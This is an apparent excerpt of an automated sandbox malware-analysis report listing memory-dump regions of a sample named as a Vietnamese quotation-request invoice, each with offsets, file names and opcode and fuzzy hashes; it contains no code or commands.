                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c70ca8b61a0fc7beef0b05b3bf8899eed68a15846abcb3ef8d3f687f22a67c9f
                                                                                                                                                                                                                                                                  • Instruction ID: 09ed5a036e139a3dc36d94c36680be49548205ac57c863b4cc8b6bdc0a0f5c04
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c70ca8b61a0fc7beef0b05b3bf8899eed68a15846abcb3ef8d3f687f22a67c9f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA61AFB170470A8FD718CFAAD884A6BB7F6EF94218B18C82DD542C7754D770E846CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f9869be2024d5b6c80442a994636ede6bd87495f7931514526eb9d272e174108
                                                                                                                                                                                                                                                                  • Instruction ID: 7148b36abcf054ab4f0baacf7dff6d67df8db72264bbf372d2870f1ce5278dc5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9869be2024d5b6c80442a994636ede6bd87495f7931514526eb9d272e174108
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 965136B57242288FCB08DF68D89896DB7B5FF99714B1580AAE506DB361DB31EC04CB81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d506f73a44fafa4ebfd951e3e519b8855d4b55d061968c5eaa3d3ac2b9e7af11
                                                                                                                                                                                                                                                                  • Instruction ID: 78081b88ff978830bdaa386956073ab0bc33cadb18acd4dc0843d6314726a340
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d506f73a44fafa4ebfd951e3e519b8855d4b55d061968c5eaa3d3ac2b9e7af11
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE4181B9B001068FDB14DF69D8809AEF7F5EF98254B118179DA09D7351DB31EC42CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b2c6365192613daa9a349eed5adbbfa1492474d846afc90784dc03bbdafe97c4
                                                                                                                                                                                                                                                                  • Instruction ID: d9568f8c18475a4d5d2d7f283c82e3234de09e26ed3624ec701b09ea1bc854f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c6365192613daa9a349eed5adbbfa1492474d846afc90784dc03bbdafe97c4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15512AB0A45219CFEB24CF69D884BBDBBF5FB4A348F26D0A9C009A7251DB745985CF10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 201bb294674cd52d5bf25d1a7b702a6326c3866cf217bf7afc1451902e26cf6d
                                                                                                                                                                                                                                                                  • Instruction ID: c03e1deaafea265f384433c836e4af6fb51bea9d40824679783c8d6ec54b3080
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 201bb294674cd52d5bf25d1a7b702a6326c3866cf217bf7afc1451902e26cf6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89310E717082449FCB04EB78D44486E7BFA9B8A254B1484AAE54ACB762DF349D02CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 92554fd3291bfbf227df314481062a6c44479c20af70bf3722d47c5e611b644a
                                                                                                                                                                                                                                                                  • Instruction ID: 009bb709225aea98b95973278e2c57254a3586e6692aaead48230aa8c897c065
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92554fd3291bfbf227df314481062a6c44479c20af70bf3722d47c5e611b644a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 294158B4E00249CFCB15CFA5D594A9DBFB2EF89310F158569E801EB361EB70E946CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a89aec0280f9e14004dbe08f4280049e49f981132eef3bb97aa899588ac74f57
                                                                                                                                                                                                                                                                  • Instruction ID: 21e1e26ec79cda61d03a422b84995550200765160f248e5ea8b82537a5a38e08
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a89aec0280f9e14004dbe08f4280049e49f981132eef3bb97aa899588ac74f57
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9641D3B1600209AFDB25DFB8D445BBEB7B2AFC0350F14862DD142D7590CB74B999CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8a415cc26fa05ba8887d899ebf2c1c21caa5a24ee650e4f665903d479a7e4fbd
                                                                                                                                                                                                                                                                  • Instruction ID: 565f37d274abbe30f5164ede797a30af27a20b0eb687796ab950cbd81bc584ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a415cc26fa05ba8887d899ebf2c1c21caa5a24ee650e4f665903d479a7e4fbd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 784153B4E15209DFDB05DFA9D804AEEBBFAFB8E340F148429D408B7250D7344A10CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 092ebd8a165f2bc01dc5bf7cf7d1c20823754256044ab886e8926121c164e8a6
                                                                                                                                                                                                                                                                  • Instruction ID: 5472721679623b8dbcd519c40b8964a301b657d20275220215fa8023ef79f54a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092ebd8a165f2bc01dc5bf7cf7d1c20823754256044ab886e8926121c164e8a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F84132B4D05208DFDB05CFA9D804AEEBBFAFB8E340F04842AD408BB250D7345A10CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8849668ca739b5a3272cdf54369dca42c8a23d8b9c4283fd4c0e7fdd30d6b067
                                                                                                                                                                                                                                                                  • Instruction ID: ada57488ac69e06f013799c57289890c6bdb80cdb7f6c24bd50934eae7721417
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8849668ca739b5a3272cdf54369dca42c8a23d8b9c4283fd4c0e7fdd30d6b067
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A641A2707042558FCB15DF38C888A7FBBF6AF99244B14496EE246C7361DB74E905CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ad193d9e207c7e3f00b1529eec81a31dac9a7cc4565c7645d7c86bf140f29c81
                                                                                                                                                                                                                                                                  • Instruction ID: 2efa894d134c23677f2f87dbfcf083495f92e10b6452c07ba297a998d4861a3c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad193d9e207c7e3f00b1529eec81a31dac9a7cc4565c7645d7c86bf140f29c81
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA31B3B5B001098FDB10DF69D984AAAF7FAFFC4254B14C17AD508C7752EB71E8518B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 28d6779be32148d091327ee8f2930beb94ee3bf63c347fce9cb0b194536b3475
                                                                                                                                                                                                                                                                  • Instruction ID: e26aa7e39468edbad8c60c005d4df0aad5f7670b9c9465bddf915fb6a5c9553e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28d6779be32148d091327ee8f2930beb94ee3bf63c347fce9cb0b194536b3475
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 254139B4E00609DFCB14CFA5D59499DBBB2FF89310F258529E801EB360EB70E946CB40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4d330776153215619e664b5ce1202b7181155d831e3bb62c29d4d83a9c1d3dea
                                                                                                                                                                                                                                                                  • Instruction ID: 167dda85fe7b378e7eb94679c4c828a882f8947f68a8f7488faa11d9501b166e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d330776153215619e664b5ce1202b7181155d831e3bb62c29d4d83a9c1d3dea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7731A375304602CFC725DF35C484966FBE2BF89314708CA6DD4468B7A2CB34E846CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9d0bebc157c1048816b68ddadfe34de3d915c764ed476a630d792b4c349fd49d
                                                                                                                                                                                                                                                                  • Instruction ID: 1e9c57c3c7dc030e5468d34b860fbe999551f6ba3f8c6e4289f4475b64ed4fae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d0bebc157c1048816b68ddadfe34de3d915c764ed476a630d792b4c349fd49d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C04149B0C05349EBEB24CFA5D589BDDBFB0AF58358F14C41DD401A6690CB799885CF62
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c700c54bbfb5bae5925e9461fa07e3c3a77516e6dca3988d4e7c031d602c1cea
                                                                                                                                                                                                                                                                  • Instruction ID: 2597111f91e7c28ea6577c32de7c350a25764a0fe3affe95f2ccbd0b107449cb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c700c54bbfb5bae5925e9461fa07e3c3a77516e6dca3988d4e7c031d602c1cea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B231ADB0D04209DFDB04DF69C8046AEBBF5EF89348F1584BAD014EB250DB786A24CF51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 933f23c8cea5cfe48d619eb13efa209c527c1650653ebb4b2193c015780bedc3
                                                                                                                                                                                                                                                                  • Instruction ID: 49d9aa710b5b842d340d8b28b98e1e6ee049aefd7da714a626ca24b613b56ad7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 933f23c8cea5cfe48d619eb13efa209c527c1650653ebb4b2193c015780bedc3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE21BFB5B005169FCF14DF68D490ABEB7B2EFC8224B1580A9D906EB354DB35EC51CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fc7b98c4f62df5d1409badb9bff47b790a4ef670177fbeb4ace77905237a0c34
                                                                                                                                                                                                                                                                  • Instruction ID: 94924a0d4ea16f90b9fe27a980a7ab22f501186d3b5615465e6e01fbbc72d132
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc7b98c4f62df5d1409badb9bff47b790a4ef670177fbeb4ace77905237a0c34
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B318EB0D04209DFDB04DFAAD8446AEB7F5EF89348F158876D114E7254DB786A20CF51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: efe20026c696fe8a7d3314a0396a3728f7acd72f039edc2c8097d30d3fe25fcd
                                                                                                                                                                                                                                                                  • Instruction ID: 4685aee8cba276787ed873406756cdd5b461981853d28d3466bdc68074efb2a5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efe20026c696fe8a7d3314a0396a3728f7acd72f039edc2c8097d30d3fe25fcd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9721DEB5B0021ADFDB14EF70DC886BA73A6EB84254B05803AEA05DB345EF31DC12CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.353623703.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_8fd000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f93fa4bbe0598484e191b930d917325ce3d941f10bc08b1847ea15ec8bf08e4e
                                                                                                                                                                                                                                                                  • Instruction ID: 51be4950c6b200c515231fda0650a9340087ef3769ebd4684536bb0c00d307da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f93fa4bbe0598484e191b930d917325ce3d941f10bc08b1847ea15ec8bf08e4e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C21D6B1504348DFDB05DF24D9C0B36BB66FB98318F248569DB058B246C336D856DAA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.353804742.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a5d000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3e3dac1c25863304532abe3c001cfbd159615f02fb077dc467984768a51f0180
                                                                                                                                                                                                                                                                  • Instruction ID: 4f90225e98d017610ff08b0b263b389be47265c0abf0554223b1c025e91be596
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e3dac1c25863304532abe3c001cfbd159615f02fb077dc467984768a51f0180
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F2107B5504244DFDB24DF20D4C4B16BB65FB84315F24C569DD4A4B386C73AD84BCB61
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8c91268fae1e0a19c58873cce24c628593b80dc8a7e45271bdc4244118f95c4b
                                                                                                                                                                                                                                                                  • Instruction ID: a4d46542addb9459f6bc0214815c44b7377ec586329d7e78670c7d1143f6dcef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c91268fae1e0a19c58873cce24c628593b80dc8a7e45271bdc4244118f95c4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA118EB57042058F9718DA2DD890A2AA3EAEBD8264B15C03EDA0AC7795EF72EC40C350
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d563be3a8911b6a6a3434142c3e32631f9f2ebfbf8d724f7655fc9fb2cd1cf78
                                                                                                                                                                                                                                                                  • Instruction ID: 6afc759b4b57cb2e15fe044137a75a1e4014e7014b85b30576c88b326acd5ecf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d563be3a8911b6a6a3434142c3e32631f9f2ebfbf8d724f7655fc9fb2cd1cf78
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F1191B13082165F67149AAEA494A6BB3EEEBD41A5315803FE50DC7745EEB1DC014390
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
